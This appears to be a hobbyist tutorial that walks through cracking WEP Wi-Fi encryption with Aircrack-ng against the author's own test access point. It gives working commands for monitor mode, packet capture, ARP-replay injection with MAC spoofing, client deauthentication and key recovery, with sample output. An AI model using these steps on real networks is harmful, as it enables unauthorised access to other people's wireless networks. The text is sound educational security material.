Yeah...I know. It's pointless to post this, as there shouldn't be any WEP networks in use out there. But for the completeness, let's go through it anyway.
If you have read the article Basic WPA cracking and the article Manual Wlan config, let's go into legacy mode for a minute and look at WEP.
What's the point you ask, weeeeell, in these C-days, I'm bored, needed something to do. So without further delay, let's get to it :)
We're gonna need a client on the network, and an access point that can run WEP. Most AP's can, almost no matter how old they are, so that's not a problem.
Next, we need a Wifi card that can do injection. For this tutorial, I'll need the following settings.
AP BSSID is 00:23:69:2F:6B:F5, The ESSID is linksys. The password is 1234567890. Yeah, I know. Not a good password, but since this is just a test, it doesn't really matter.
Client is 2C:FD:AB:E0:0D:AB, a Lenovo tablet, set up on the network.
So, we have everything. But, how do we do this ? what steps do we need ?. Since we have a client, we can simply run an ARP replay attack, using Aircrack-NG. Pretty basic, and easy to do.
We need three terminal windows to setup the attack, some coffee, and some patience. With patience I mean an attention span of 15 minuttes should suffice :)
The first thing we need, is setting up the network card in monitor mode, to identify the network, and see what we got. We do that with this command.
airmon-ng start wlanxNext, when that's running, and shows us the networks around us, we'll need to lock onto the target network. We do that with this command
airodump-ng -d 00:23:69:2F:6B:F5 -c 11 -w linksysdump_wep wlan0monNotice the -d switch, that's the AP MAC, -c switch is channel, here it's 11. And finally we write a dumpfile for the cracker to work with, and call it linksysdump_wep. It should end up with linksysdump_wep.cap.
We need it for the cracker to use later on, that's why we save it.
Next we see something like this in our terminal.
CH 11 ][ Elapsed: 16 mins ][ 2020-04-07 18:56
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:23:69:2F:6B:F5 -46 81 8143 31838 1 11 54 WEP WEP SKA linksys
BSSID STATION PWR Rate Lost Frames Notes Probes
00:23:69:2F:6B:F5 2C:FD:AB:E0:0D:AB -25 54 - 6 0 49495 linksys That tell us our sniffer is working. Note ENC=WEP, and CIPHER=WEP. The "Data" collum is the one we need to keep an eye on. For a start, it won't rise very quickly, since we don't have any client connect.ed
If we have, it still won't rise very quickly, because the client isn't doing much. IF it's streaming audio or video, the data will rise a bit faster, but not much. Since we need a lot of data collected to crack the key, what do we do ?
Well, we can inject data, and force the AP to send data back, and thus, our traffic rises, and then we can crack the key.
But, how do we do that ?. Well, keep airodump running, and open another terminal. We need to run aireplay-ng, to force traffic up. We do that with the command
aireplay-ng --arpreplay -b 00:23:69:2F:6B:F5 -h 2C:FD:AB:E0:0D:AB wlan0monThe -b switch is the AP's MAC, the -h switch is the client we're spoofing's MAC address, and lastly we give our monitor interface as wlan0mon.
If it's working, you'll see something like this, in aireplay's window, telling you that injection is running. If you do, keep it running, and watch the airodump window. You should see data beginning to speed up.
The interface MAC (00:13:EF:F1:03:69) doesn't match the specified MAC (-h).
ifconfig wlan0mon hw ether 2C:FD:AB:E0:0D:AB
18:47:45 Waiting for beacon frame (BSSID: 00:23:69:2F:6B:F5) on channel 11
Saving ARP requests in replay_arp-0407-184746.cap
You should also start airodump-ng to capture replies.
Read 1011 packets (got 107 ARP requests and 71 ACKs), sent 597 packets...
Read 1342 packets (got 131 ARP requests and 84 ACKs), sent 647 packets...
Read 1696 packets (got 156 ARP requests and 96 ACKs), sent 698 packets...
Read 1994 packets (got 185 ARP requests and 113 ACKs), sent 748 packets...
Read 2148 packets (got 203 ARP requests and 124 ACKs), sent 797 packets...
Read 2287 packets (got 227 ARP requests and 137 ACKs), sent 847 packets...
Read 2371 packets (got 259 ARP requests and 155 ACKs), sent 898 packets...
Read 2463 packets (got 286 ARP requests and 169 ACKs), sent 947 packets...If it's NOT, if data's not picking up speed, try to kick a client off the network, and see if that works. You do that in a new terminal window with the command
aireplay-ng -0 1 -a AP_MAC -c CLIENT_MAC monitor_interface
If data's getting up to speed, let's get cracking. Time for aircrack-ng to do it's job. We need at least 5000 IV's, so wait for the data collum to read 5000, before you start the cracker. We start the cracking process with the command
aircrack-ng -a 1 -b 00:23:69:2F:6B:F5 linksysdump_wep-01.cap
The -a switch is WEP attack mode, -b is bssid (AP's MAC), and lastly we give our dump cap file to the cracker to read data from.
Simply let it run. If it bitches about not enough IV's. Try running the command again at 10000,15000,20000 IV's, and keep trying for every 5000-10000 iv's. When it got the right key, it shows something like this
Aircrack-ng 1.6
[00:00:05] Tested 34585 keys (got 27266 IVs)
KB depth byte(vote)
0 0/ 1 12(43776) 7C(35072) 0C(33536) C1(32768) D0(32768)
1 0/ 3 34(38656) 2A(34816) 67(34304) 10(33792) 57(33792)
2 22/ 25 BD(30976) 57(30720) 9C(30720) 0B(30464) B6(30464)
3 0/ 20 78(35584) 38(34048) DB(33536) 33(33536) 40(32256)
4 23/ 24 90(30976) 0A(30720) 10(30720) 17(30720) 90(30720)
KEY FOUND! [ 12:34:56:78:90 ]
Decrypted correctly: 100%
That's all there's to it. Here it took around 15 minutes for the entire process. As long as you get injection to work, it's only a matter of time, before you can crack the key. That's why WEP really shouldn't be used anymore :)
Happy cracking, and as always..do stay off your neighbours Wifi :)